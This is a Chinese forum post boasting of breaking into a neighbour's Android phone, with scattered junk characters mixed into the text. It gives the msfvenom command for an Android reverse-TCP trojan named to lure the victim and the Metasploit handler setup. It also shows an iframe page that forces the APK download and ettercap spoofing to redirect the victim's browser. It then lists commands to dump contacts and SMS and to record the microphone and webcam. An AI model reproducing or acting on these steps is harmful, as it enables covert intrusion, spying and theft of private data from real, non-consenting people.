metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

# i" N0 C c- Y3 p 五、msf+ettercap入侵邻居安卓手机 + {8 M7 s( }0 {: K

% ^0 } i6 \- h' U u 首先启动msf / t6 D9 I' E" [: ~! o1 b2 F2 @

) M2 [- ]( ^( Y1 B, N3 a" O, y 先用kali生成一个安卓木马，如下命令： & i/ R; B9 |6 \% c$ L+ N0 s- w7 M

/ W1 K- Y% z" S0 h Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk / c4 ~! x6 @! Y

( B* @" _3 S0 r2 M p [ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 . N! R$ m1 \- P6 `3 s

) k7 g6 q( y4 P 然后进入msf 9 I, i( L# J$ D' ]- j) V8 o/ Y

( E+ b/ M) Z1 q3 c5 e; H use exploit/multi/handler 2 y$ i9 ~/ `* L0 }( J. y

' V) N; ]/ {& A set payload android/meterpreter/reverse_tcp ( G {0 [' p% c# P h$ i

1 ]% s8 q# j) V( L( S- P set LHOST 192.168.0.109 //ip为kaili的ip & w. p$ E: h! ^; q! ?

; i- U2 _$ \ U& e: c set LPORT 44444 //端口一定要与前面生成的木马的端口一致 9 ~8 Q5 i( y" N! Z! J

$ j/ k5 k7 g* e$ B Exploit 7 _- `( }, F7 O7 t& u( w

# L! C% Y/ T' ?4 y* l 1 T" M$ q* B: X4 t6 A9 a& d8 c

+ M6 D! [2 Z/ _0 N 下面我们开启ettercap -G 3 Q. b* r" v4 f+ x9 s( b; U5 X

! [; Q Y0 B2 ]. s# T( p* `5 a; h 我物理IP为 ! |) E) @; E/ o6 u4 c

; e: W8 u6 ~& j- \; D/ F" a+ y# t # q. h& q1 _ W0 ?! P$ V, g/ _

7 O3 c5 |. h" o9 u& a, H2 _1 q 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， ) f9 u6 q R+ i' q4 i# v5 \

( T) }( j# ~/ x5 F 下面我们来设置一下 9 l( I; v6 ?* j% d6 Q, H

6 o, @! u1 _& k; L% [ / c1 w7 z. a/ s

! t4 U) p. G' ~ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， ^8 y4 n3 `3 z" E/ {+ W1 i! o. U

3 V n9 d; x1 C, m 4 U# B6 y6 ]* E$ f9 U

$ C5 h7 F" i# n! P# O: m+ f9 k- N . u0 O; i8 y; V+ F# o+ F9 E

( D% M. _7 q% d# l! G7 E7 _, U + @: B$ {$ k. P5 c% w/ @( s

6 T" m' K0 A7 v+ ` A 9 f6 ?4 e+ }( c3 h

9 x5 Q, L1 r7 j! d' C7 R5 j( d7 b 2 ?4 ?) u, b$ {3 x4 S

- h) `' U6 ^1 C4 M3 N( U( V ! k4 U8 f9 b6 d/ O" d0 R$ B, S

- \7 f# G$ Z' x; B8 x$ J7 ? 9 \) U; G/ N. m1 U4 z0 R) s

+ M k1 Y8 k7 U* ]1 d , s- O3 Y; Y/ q# |

7 F5 W7 L, z; D W5 X3 w7 e V# N; t, \" \0 w

" n6 l7 E9 `( v) G0 c4 n b 8 y' }- {1 I* m5 F- }

: ^8 m/ i; _- K6 q$ b ; ^6 |& `9 D/ Z' H

& P5 p* l- A, l, H1 J 6 o# b2 G# o1 @9 [4 }

. W2 c8 r; u: T5 l & }# {' R/ _, l2 v# p

J9 \8 {9 E: [ 下面我们开始攻击 0 [, P4 S- b5 y' a% Z ]

6 c7 M9 z( p* z* y+ x 4 \7 V% f$ G1 F5 R

: g' {" p8 k. D" N * P- v$ r$ ?. A; g

) W% `- K2 I4 D( e# _9 S $ F. K ?3 m; w4 L# V

) Y. x; `4 T9 W: t 9 Q+ |2 T* A: O

% O& T. j. |, y/ Z . c+ G& Z" H. v: {6 x

6 x, e2 k$ |8 a% P 大概过了5分钟多，发现反弹成功了 + Q) m4 j0 N, o# A3 d

/ f1 ?9 S1 ?7 X: C. p2 s' W ) x1 Q' V. F7 @' c

( |6 K* h' r+ ^! J / }/ F) a0 V. y7 W; H/ E

0 U* A( s* L" c8 L: y 1 a! K9 i. j) K* d3 i

6 ]2 q+ l; E% c! V- W0 u* x9 x# a; ^9 U 7 B: R+ K7 t8 G7 w

( A# G& O4 d! S7 } . I! x! q6 W* m' X

- s; i5 t# W# k : h& E, s! ?7 n. \4 \+ Y* x

/ y" `' a2 K+ T) x( A 8 B2 L) |) g% k( U2 Y' i7 l: I

, [: }; S! B. f1 {! J `/ I 执行命令 $ t. j4 _3 G, r" Y* n# @! d7 O

; [6 f, O, ?6 a; z% ] , Y+ L' k( U3 a2 Z0 H) X2 O

& G6 \# ^& U* g c8 i dump_contacts --》这个是导出电话 7 A9 o( s( k5 B% ^) B& E8 F

% C$ [8 T8 N+ k( x dump_sms --》这个是导出信息 3 Y% a! t& c/ r3 D1 j' A2 X5 Q; F% f6 u

3 \" x+ V: H) K6 R record_mic Record audio from the default microphone for X seconds ) H6 v5 Q7 c( F9 t) ~

) F+ d' T. W7 j0 e5 h0 P webcam_chat Start a video chat * u1 o& ]# E% _, x( N

# Y& L) }! y6 v2 I8 I% Q webcam_list List webcams 0 _( E" n# Z T( b, A. Z A

& [5 f" N* |2 O webcam_snap Take a snapshot from the specified webcam 2 ] Z2 Q& P) O. d* `/ k

8 Q; P$ \: ?) m0 e webcam_stream lay a video stream from the specified webcam N. j6 C' b1 j3 Z u% M

; i7 `" O% k6 b - Y+ n0 x& N0 Q

7 G" {0 R& S: p+ ] . v7 I) Q j* N! s! \$ W5 e

& b7 Y( U" @) |+ m7 r 我们打开看一下电话薄， ! H) s5 B- d' s3 _" a

, ?# [* T6 Z! F0 O& j) k ' G4 p9 V4 i' o& C0 |

; ?. G! c( d+ [, Y; S . c- k* V; ~9 r3 ~' j# z

# j4 F0 k+ G' U3 \ ; i# ^3 a; y* G6 A& ~

+ r$ X! i% D/ M : |" @$ e8 }! O6 b2 ~! t

- A6 W6 d0 U" C8 w! h9 Y 3 _/ s% a B g N

( g* O3 ]7 X2 P9 a / q* K; p6 J/ D0 f# V4 `1 u2 a) w8 q

' D* e" w) X1 M) T8 \8 D 我们同时欺骗成DroidJack木马，使用方法如图： ' j+ o- k3 m, S1 z

+ W# m0 L5 W& v6 d% p& J3 z & W7 I1 ~$ g( j2 a

2 z8 \5 q0 ?+ O* l6 z: P % {/ X e2 y; s. S% w2 D8 A0 P

& `2 f# V* ~' `5 x * T9 H+ Z7 V( }2 ]

1 v1 {$ f- p8 L; F/ h+ X) Y1 S 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 - e) W1 b0 |+ H% g1 I8 m3 T; y

& K- L& L: ?4 A1 e4 x 7 D5 [) k2 q1 b+ K, e* ]

% j0 ?5 ?$ W2 P1 V 6 `# X3 f1 y' D' Q/ j) v# E

7 ?# X& _% L! X6 ~ , J5 d& q7 N1 U8 S# }( o

- a0 U/ x( T5 @* o' b & H9 K- b% a0 n5 Q

% G+ w1 P; c3 l0 m
4 Y. t+ K6 z) l% ], e$ `: X

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块